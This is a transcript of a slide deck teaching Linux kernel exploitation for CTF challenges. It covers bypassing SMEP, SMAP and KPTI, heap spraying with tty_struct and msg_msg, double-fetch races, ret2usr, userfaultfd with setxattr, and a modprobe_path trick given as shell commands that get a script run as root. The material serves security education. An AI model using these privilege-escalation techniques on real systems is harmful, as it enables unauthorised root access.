Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Kernel Exploitation

yuawn
December 19, 2020

Kernel Exploitation

yuawn

December 19, 2020
Tweet

More Decks by yuawn

Other Decks in Research

Transcript

  1. Outline • Linux kernel Concepts & Debug • Kenrel Protection

    • smep, smap, kaslr, kpti • Leak & useful structures • tty_struct, shm_ f i le_data, msg_msg ... • Kernel Common Vulnerability • double fetch • race condition • Exploitation & Tricks • ret2usr - bypass smep, smap, kpti • signal handler • modprobe_path • userfaultfd, setxattr, msgsnd & msgrcv, ... ROOT
  2. Kernel • Software • implemented syscalls • Communicate with hardware

    • Intel CPU ring model: • ring 0, ring 1, ring 2, ring 3 • ring 0: kernel space • ring 3: user space kernel OS Applications hardware: CPU, Memory, Disk, Devices
  3. Kernel - LKM • Loadable kernel module • Programs running

    in kernel space • drivers • kernel extensions kernel OS Applications hardware: CPU, Memory, Disk, Devices kernel module
  4. Kernel - functions • • • • • copy_from_user(void *to,

    const void __user *from, unsigned long n) copy_to_user(void __user *to, const void *from, unsigned long n) printk() kmalloc() kfree()
  5. Kernel Pwn • kernel exploitation • Privilege Escalation - 提權

    • linux root account • user space to kernel space • ring 3 -> ring 0
  6. Kernel Pwn • Modi f i ed kernel • Mobile:

    Android, ARM TrustZone • IoT • Kernel Module • Original Linux Kernel • CVE Hypervisor ARM Trusted Firmware APPs Trusted APPs OS (kernel) Trusted OS
  7. CTF Prepare - f i les • bzImage - kernel

    • initramfs.cpio.gz - f i le system • run.sh - shell script for running qemu
  8. CTF Prepare - running script • run.sh • How to

    run with qemu • check kernel protections: • smep, smap, kaslr • #!/bin/bash qemu-system-x86_64 \ -kernel ./bzImage \ -initrd ./initramfs.cpio.gz \ -nographic \ -monitor none \ -cpu qemu64,+smep,+smap \ -append "console=ttyS0 kaslr panic=1" \ -no-reboot \ -m 256M https://github.com/torvalds/linux/blob/master/Documentation/admin-guide/kernel-parameters.txt
  9. CTF Prepare - kernel • bzImage • https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux • $

    ./extract-vmlinux.sh bzImage > vmlinux • vmlinux: ELF 64-bit LSB executable, x86-64 • static analysis • Find kernel ROP gadgets: • $ ropper --nocolor -- f i le ./vmlinux > rop
  10. CTF Prepare - f i le system • initramfs.cpio.gz •

    $ gunzip initramfs.cpio.gz && cpio -idv < initramfs.cpio • Gain f i le system • /challenge.ko - kernel module • /init • / f l ag • -r-------- 1 root 0 / f l ag
  11. CTF Prepare - init f i le • /init •

    觀察題⽬初始化設置 • insmod challenge.ko • echo 1 > /proc/sys/kernel/kptr_restrict • 0 -> no restrictions • 1 -> User 要有 CAP_SYSLOG 權限 (root) • 2 -> 不管權限如何 %pK 通通換成 0 • echo 1 > /proc/sys/kernel/dmesg_restrict • 0 -> no restrictions • 1 -> User 要有 CAP_SYSLOG 權限 (root)
  12. CTF Prepare - .ko • /challenge.ko • 題⽬ binary 主體

    • 通常會實作成⼀隻 miscdeivce 或 driver,可以透過 open 來使⽤ ioctl 或是 f i le operations 和 kernel module 溝通與使⽤操作。 • /dev/challenge • /proc/challenge
  13. CTF Prepare - exploit • 使⽤ C (或其他語⾔) 撰寫,編譯出 exploit

    binary • 上傳到 remote server 的 qemu vm 中 • printf "" >> exp • echo "" | base64 -d >> exp • $ musl-gcc -static exp.c -o exp • 輕量 libc,縮⼩ exp binary ⼤⼩,減少上傳時間 • $ sudo apt install musl-tools • shell 執⾏ exploit
  14. Debug • $ dmesg • printk() • $ cat /proc/kallsyms

    • function symbol • f i nd kernel base: • $ cat /proc/kallsyms | grep _text | head -n 1 • $ cat /proc/modules • f i nd kernel module base: • $ cat /proc/modules | grep <module name> • $ cat /proc/slabinfo
  15. Debug • 修改 init 檔案,獲得 root 權限,⽅便 debug • setsid

    cttyhack setuidgid 1000 sh • setsid cttyhack setuidgid 0 sh • 打包回去給 qemu 跑: • $ f i nd . -print0 | cpio --null -ov --format=newc > rootfs.cpio 2>/dev/null
  16. Debug • run.sh qemu-system-x86_64 • -s 開 gdb debug port

    在預設 port 1234 • -S 停在整個 CPU 執⾏的⼀開始 • -append "nokaslr" 關掉 kaslr • gdb 連上去 • target remote localhost:1234 • add-symbol- f i le challenge.ko baseaddr • add-symbol- f i le vmlinux baseaddr
  17. smep • Supervisor Mode Execution Protection • 在 ring 0

    kernel mode 底下,不能執⾏ user space 的 code • 記錄在 cr4 register 中
  18. smap • Supervisor Mode Access Protection • 和 smep 類似,在

    ring 0 kernel mode 底下,不能存取 user space memory • 記錄在 cr4 register 中
  19. kpti • kernel page-table isolation • cr3 register • page-table

    entry • 效果類似 smep + smap • Meltdown, Spectre • $ dmesg | grep "Kernel/User page tables isolation: enabled"
  20. Leak • CVE • 1 day • 0 day •

    Vulnerable implementation in kernel module • 概念和⼀般情形相同 • uninitialize • oob or arbitrary read write • race condition • ...
  21. Leak • 如果有未清空未初始化等漏洞,則可以透過 copy_to_user() 將 address 寫回 user space,leak 出殘留內容。

    • 如未對於請求的 kernel heap 清空或初始化,會希望在 user space (exploit binary) 中, 做⼀些會在 kernel 中請求記憶體 (kernel heap) 的操作使得 kernel heap 上殘留 kernel, kernel stack, kernel heap 等 address,使得後續 kernel module 拿到的 heap chunk 上 有這些資訊。 • 概念類似 heap exploitation,free 出 unsorted bin,使 heap 上出現 libc address。 • ⽬標找出類似這樣概念好⽤的 kernel structure 來分配。
  22. useful structure for leak • ⽅便從 user space 中控制分配與釋放 •

    size 合適,⽅便後續⾼機率拿到同⼀塊。 • heap spray • 視情況是否可以控制 kmalloc() 的 size • structure 中滿滿的 pointers • kernel text, heap, stack • vtable: function pointers
  23. useful structure for leak • tty_struct (0x2e0, 02c0) base, heap

    • shm_ f i le_data (0x20) base, heap • seq_operations (0x20) base • msg_msg (0x30〜0x1000) heap • subprocess_info (0x60) base, heap • ... • 任何發覺可使⽤的 structure • structure size 會因為 kernel version 變動 • https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628
  24. tty_struct • Leak: base, heap • Size: 0x2c0 • size

    少⽤,好拿取到同⼀塊 • • ⽅便從 user land trigger • tty_operations • 類似 vtable,存了許多對於 tty 操作對應的 function pointer 如 open, write, close, ioctl ... • 如果可以 UAF 等,可以透過 overwrite struct tty_operations 指向可控區域,如修改 write operation pointer,對 tty 做 write(pfd, ,) 時,則可以控制 kernel rip int pfd = open("/dev/ptmx", O_RDWR|O_NOCTTY); struct tty_struct { int magic; struct kref kref; struct device *dev; struct tty_driver *driver; const struct tty_operations *ops; int index; /* Protects ldisc changes: Lock tty not pty */ struct ld_semaphore ldisc_sem; struct tty_ldisc *ldisc; ...
  25. tty_operations struct tty_operations { struct tty_struct * (*lookup)(struct tty_driver *driver,

    struct file *filp, int idx); int (*install)(struct tty_driver *driver, struct tty_struct *tty); void (*remove)(struct tty_driver *driver, struct tty_struct *tty); int (*open)(struct tty_struct * tty, struct file * filp); void (*close)(struct tty_struct * tty, struct file * filp); void (*shutdown)(struct tty_struct *tty); void (*cleanup)(struct tty_struct *tty); int (*write)(struct tty_struct * tty, const unsigned char *buf, int count); int (*put_char)(struct tty_struct *tty, unsigned char ch); void (*flush_chars)(struct tty_struct *tty); int (*write_room)(struct tty_struct *tty); int (*chars_in_buffer)(struct tty_struct *tty); int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg); .... • include/linux/tty_driver.h
  26. • heap spray tty_struct for( int i = 0 ;

    i < 0x100 ; ++i ) pfd[i] = open( "/dev/ptmx" , O_RDWR | O_NOCTTY ); // tty_struct for( int i = 0 ; i < 0x100 ; ++i ) close(pfd[i]);
  27. double fetch • kernel space 與 user space 間 race

    condition • kernel 存取兩次來⾃ user space 的 data,產⽣ race condition 的空隙
  28. double fetch User Space Kernel Space Program kernel module 1st

    fetch (check) syscall/ioctl memory 0x401000: 0x30 copy_from_user()
  29. double fetch User Space Kernel Space Program kernel module 1st

    fetch (check) syscall/ioctl memory 0x401000: 0x30 copy_from_user() 2nd fetch (use) check 
 0x30 < 0x100 True
  30. double fetch User Space Kernel Space Program kernel module 1st

    fetch (check) memory 0x401000: 0x30 syscall/ioctl copy_from_user() check 
 0x30 < 0x100 True memory 0x401000: 0x30 copy_from_user() 2nd fetch (use)
  31. double fetch User Space Kernel Space Program kernel module 1st

    fetch (check) syscall/ioctl memory 0x401000: 0x30 copy_from_user()
  32. double fetch User Space Kernel Space Program kernel module 1st

    fetch (check) syscall/ioctl memory 0x401000: 0x30 copy_from_user() 2nd fetch (use) check 
 0x30 < 0x100 True
  33. double fetch User Space Kernel Space Program kernel module 1st

    fetch (check) memory 0x401000: 0x1000 syscall/ioctl copy_from_user() check 
 0x30 < 0x100 True memory 0x401000: 0x1000 modify user data 2nd fetch (use)
  34. double fetch User Space Kernel Space Program kernel module 1st

    fetch (check) 2nd fetch (use) syscall/ioctl copy_from_user() check 
 0x30 < 0x100 True memory 0x401000: 0x1000 modify user data copy_from_user() 0x1000 < 0x100 memory 0x401000: 0x1000
  35. double fetch User Space Kernel Space Program kernel module 1st

    fetch (check) 2nd fetch (use) syscall/ioctl copy_from_user() check 
 0x30 < 0x100 True memory 0x401000: 0x1000 modify user data copy_from_user() 0x1000 < 0x100 False memory 0x401000: 0x1000
  36. memory 0x401000: 0x1000 double fetch User Space Kernel Space Program

    kernel module 1st fetch (check) 2nd fetch (use) syscall/ioctl copy_from_user() check 
 0x30 < 0x100 True memory 0x401000: 0x1000 modify user data copy_from_user() 0x1000 < 0x100 False Pwned ☠
  37. ret2user • user mode 不能 access kernel space,kernel mode 可以

    access user space • 在 kernel mode 執⾏時 return 到 user space,帶著 ring 0 特權執⾏ user code • control kernel rip • Status Switch • user space to kernel space • kernel space to user space • arch/x86/entry/entry_64.S
  38. ret2user • Status Switch • kernel space to user space

    • Restore GS value by swapgs instruction • iret instruction • iretq • Stored register value at stack user cs iretq user space rip user r f l ags user sp user ss kernel rsp swapgs ; ret
  39. ret2user • Status Switch • kernel space to user space

    • Save status size_t user_cs, user_ss, user_rflags, user_sp; void save_status() { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts("[*]status has been saved."); }
  40. Bypass smep • ROP • 類似 bypass NX 的概念 •

    將 kernel stack rsp 搬到 user space 上做 ROP • 直接在 kernel 中 ROP
  41. Bypass smap • ROP dead • Disallows explicit supervisor-mode data

    accesses to user-mode pages • how do copy_from_user() and copy_to_user() work?
  42. Bypass smap • arch/x86/lib/copy_user_64.S • instruction • stac • clac

    SYM_FUNC_START(copy_user_generic_unrolled) ASM_STAC cmpl $8,%edx jb 20f /* less then 8 bytes, go to byte copy loop */ ALIGN_DESTINATION movl %edx,%ecx andl $63,%edx shrl $6,%ecx jz .L_copy_short_string ... movl %edx,%ecx 21: movb (%rsi),%al 22: movb %al,(%rdi) incq %rsi incq %rdi decl %ecx jnz 21b 23: xor %eax,%eax ASM_CLAC ret
  43. Bypass smap • arch/x86/lib/copy_user_64.S • instruction • stac • clac

    SYM_FUNC_START(copy_user_generic_unrolled) ASM_STAC cmpl $8,%edx jb 20f /* less then 8 bytes, go to byte copy loop */ ALIGN_DESTINATION movl %edx,%ecx andl $63,%edx shrl $6,%ecx jz .L_copy_short_string ... movl %edx,%ecx 21: movb (%rsi),%al 22: movb %al,(%rdi) incq %rsi incq %rdi decl %ecx jnz 21b 23: xor %eax,%eax ASM_CLAC ret
  44. Bypass smap • arch/x86/lib/copy_user_64.S • instruction • stac - allow

    • clac - disallow SYM_FUNC_START(copy_user_generic_unrolled) ASM_STAC cmpl $8,%edx jb 20f /* less then 8 bytes, go to byte copy loop */ ALIGN_DESTINATION movl %edx,%ecx andl $63,%edx shrl $6,%ecx jz .L_copy_short_string ... movl %edx,%ecx 21: movb (%rsi),%al 22: movb %al,(%rdi) incq %rsi incq %rdi decl %ecx jnz 21b 23: xor %eax,%eax ASM_CLAC ret
  45. Bypass smap • instruction • stac - allow • clac

    - disallow • Only allowed in kernel mode, they fault in user-space.
  46. Bypass smap • Overwrite cr4 register • 在 kernel 中先做些事

    (ROP, ...),把 cr4 register 寫掉 -> 0x6f0 • 關掉 smep, smap 再 return 回 user space 執⾏或 ROP
  47. ret2user • Constraints • bypass smep • 將 kernel stack

    rsp 搬到 user space 上做 ROP直接在 kernel 中 ROP • bypass smap • 在 kernel 中先做些事 (ROP, ...),把 cr4 register 寫掉 -> 0x6f0 • 關掉 smep, smap 再 return 回 user space 執⾏或 ROP • kpti • f i x cr3 register - page table • swapgs_restore_regs_and_return_to_usermode()
  48. privilege escalation • ROP • • ret2user -> system("/bin/sh") •

    spawn a root shell! commit_creds(prepare_kernel_cred(0))
  49. privilege escalation • ROP • • ret2user -> system("/bin/sh") •

    spawn a root shell! commit_creds(prepare_kernel_cred(0)) ROOT ☠
  50. modprobe_path • kernel global variable • default path: /sbin/modprobe •

    $ cat /proc/sys/kernel/modprobe • 執⾏⼀個 kernel 認不得的執⾏檔格式時,kernel 會帶 root 權限執⾏這個 path 所定義的檔案。
  51. modprobe_path • sys_execve • do_execve() • do_execveat_common() • bprm_execve() •

    exec_binprm() • search_binary_handler() • request_module() • call_modprobe() • call_usermodehelper_exec() static int search_binary_handler(struct linux_binprm *bprm) { ... if (need_retry) { if (printable(bprm->buf[0]) && printable(bprm->buf[1]) && printable(bprm->buf[2]) && printable(bprm->buf[3])) return retval; if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0) return retval; need_retry = false; goto retry; } ...
  52. modprobe_path • exploitation • overwrite modprobe_path 成⾃⼰寫得 shell script,/tmp/x •

    $ echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x • 執⾏格式壞掉的執⾏檔 • $ echo -ne '\\xff\\xff\\xff\\xff' > /tmp/fake • $ chmod +x /tmp/fake && /tmp/fake • kernel 以 root 權限執⾏ /tmp/x • cat / f l ag
  53. modprobe_path • exploitation • overwrite modprobe_path 成⾃⼰寫得 shell script,/tmp/x •

    $ echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x • 執⾏格式壞掉的執⾏檔 • $ echo -ne '\\xff\\xff\\xff\\xff' > /tmp/fake • $ chmod +x /tmp/fake && /tmp/fake • kernel 以 root 權限執⾏ /tmp/x • cat / f l ag ROOT ☠
  54. userfaultfd • syscall - 323 • 註冊 userfault 記憶體區域,並⾃⾏實作 page

    fault handler • ⾃⾏控制 page fault 處理⾏為 • 當 kernel 中進⾏ copy_from_user() 或 copy_to_user() 時,access user memory 會觸發 page fault,此時可以在 page fault handler 中處理⾏為。
  55. userfaultfd • 應⽤在 exploitation 上的效果 • race condition friendly •

    如在 page fault handler 中 sleep,即可卡住 kernel 中的執⾏流程 • 先執⾏其他操作才完成對 fault 處理,控制執⾏流程先後順序 • 使其穩定發⽣能觸發 race condition 的 scenario,不需撞機率
  56. setxattr • syscall - 188 • 可以在 user space 直接使⽤

    setxattr 來接 kvmalloc() 請求 1 ~ 65536 (0x10000)範圍的⼤⼩,並且將 user land data copy 上去。 • setxattr + userfualtfd 連技 • 常搭配 userfaultfd 串招,來卡住中間執⾏ copy_from_user(),⽤可以 ⾃⾏決定處理好 page fault 的時機來使 setxattr 繼續執⾏,間接控制 kfree() 時機,可以⽤來⽅便串 UAF。
  57. • linux-5.9.12/fs/xattr.c#510 setxattr static long setxattr(struct dentry *d, const char

    __user *name, const void __user *value, size_t size, int flags) { int error; void *kvalue = NULL; char kname[XATTR_NAME_MAX + 1]; if (flags & ~(XATTR_CREATE|XATTR_REPLACE)) return -EINVAL; error = strncpy_from_user(kname, name, sizeof(kname)); if (error == 0 || error == sizeof(kname)) error = -ERANGE; if (error < 0) return error; if (size) { if (size > XATTR_SIZE_MAX) return -E2BIG; kvalue = kvmalloc(size, GFP_KERNEL); if (!kvalue) return -ENOMEM; if (copy_from_user(kvalue, value, size)) { error = -EFAULT; goto out; } if ((strcmp(kname, XATTR_NAME_POSIX_ACL_ACCESS) == 0) || (strcmp(kname, XATTR_NAME_POSIX_ACL_DEFAULT) == 0)) posix_acl_fix_xattr_from_user(kvalue, size); else if (strcmp(kname, XATTR_NAME_CAPS) == 0) { error = cap_convert_nscap(d, &kvalue, size); if (error < 0) goto out; size = error; } } error = vfs_setxattr(d, kname, kvalue, size, flags); out: kvfree(kvalue); return error; }
  58. • linux-5.9.12/fs/xattr.c#510 setxattr static long setxattr(struct dentry *d, const char

    __user *name, const void __user *value, size_t size, int flags) { int error; void *kvalue = NULL; char kname[XATTR_NAME_MAX + 1]; if (flags & ~(XATTR_CREATE|XATTR_REPLACE)) return -EINVAL; error = strncpy_from_user(kname, name, sizeof(kname)); if (error == 0 || error == sizeof(kname)) error = -ERANGE; if (error < 0) return error; if (size) { if (size > XATTR_SIZE_MAX) return -E2BIG; kvalue = kvmalloc(size, GFP_KERNEL); if (!kvalue) return -ENOMEM; if (copy_from_user(kvalue, value, size)) { error = -EFAULT; goto out; } if ((strcmp(kname, XATTR_NAME_POSIX_ACL_ACCESS) == 0) || (strcmp(kname, XATTR_NAME_POSIX_ACL_DEFAULT) == 0)) posix_acl_fix_xattr_from_user(kvalue, size); else if (strcmp(kname, XATTR_NAME_CAPS) == 0) { error = cap_convert_nscap(d, &kvalue, size); if (error < 0) goto out; size = error; } } error = vfs_setxattr(d, kname, kvalue, size, flags); out: kvfree(kvalue); return error; }
  59. setxattr + userfaultfd • 將 userfaultfd 結合⽤來卡住 setxattr 內的 copy_from_user(),使其不會

    直接⾺上 kfree() • 當需要 kfree() chunk 時,於⾃⾏實作的 userfaultfd page felt handler 中 copy mmap 出來準備好的 page 完成 page fault 處理,即可使 setxattr 繼 續執⾏完成 kfree() • 解決 setxattr 可以任意控制 kmalloc() 時機與 size, content,卻無法控制 kfree() 時機的缺點。
  60. setxattr + userfaultfd • 串招後,從 user land 可以直接: • 任意時機調⽤

    kmalloc() • 滿⾜絕⼤多數需求的 size range: 1 ~ 65536(0x10000) • 完全從 user land 控制 chunk 內容 • 搭配 userfaultfd,任意時機選擇 kfree()
  61. msg_msg • • • kmalloc(size+0x30) • 將 msgbuf 內容 copy

    ⾄ chunk + 0x30 處,前 0x30 為其 header • • kfree int qid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT) msgsnd(qid, &msgbuf, real_size - 0x30, 0) msgrcv(qid, &msgbuf, real_size - 0x30, 1, 0)
  62. msg_msg • Pros • ⽅便從 user land 控制 kmalloc() kfree()

    • code 好寫 • 比 setxattr + userfaultfd 更好控制 kfree() 時機,即使⽤ msgrcv() 即可 • Cons • kmalloc 出來的 chunk 前 0x30,不好控